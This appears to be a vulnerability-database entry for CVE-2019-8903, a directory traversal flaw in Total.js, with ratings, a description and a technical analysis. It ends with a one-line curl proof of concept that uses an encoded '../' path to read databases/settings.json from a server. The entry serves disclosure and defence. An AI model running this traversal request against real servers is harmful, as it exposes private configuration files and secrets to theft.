Attacker Value: High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: Unknown
Privileges Required: Unknown
Attack Vector: Unknown

Total.js requestcontinue Directory Traversal Vulnerability

Disclosure Date: February 18, 2019
Last updated: November 13, 2019

Description

Total.js is prone to a directory traversal vulnerability. Attackers can exploit this issue and read files remotely.

Technical Analysis

Totaljs – Unauthenticated Directory Traversal

DESCRIPTION
A user can make requests like “GET /../databases/settings.json HTTP/1.1” and include file contents from outside the /public directory, which is the default directory for accessible static files.

Refer:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json

# (note that .json is in the extensions list by default)
